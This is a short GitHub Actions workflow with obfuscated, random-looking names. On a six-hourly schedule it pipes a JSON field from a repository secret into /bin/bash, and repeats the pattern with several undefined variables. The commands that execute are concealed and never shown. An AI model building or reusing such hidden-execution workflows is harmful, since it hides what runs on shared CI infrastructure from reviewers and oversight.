name: andreilu1

on:
  workflow_dispatch:
  schedule:
    - cron: '23 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: andreilu1
        env:
          w392: ${{ secrets.w392 }}
        run: |
          echo $w392 | jq -r .nysmq7 | /bin/bash
          echo $xes72148 | jq -r .gy671 | /bin/bash
          echo $ycvts3301 | jq -r .s86 | /bin/bash
          echo $hlc37089 | jq -r .hfj482 | /bin/bash
          echo $lqts07 | jq -r .pu1 | /bin/bash
          echo $gw43 | jq -r .fwyee0 | /bin/bash
          echo $jzw241 | jq -r .arps3736 | /bin/bash

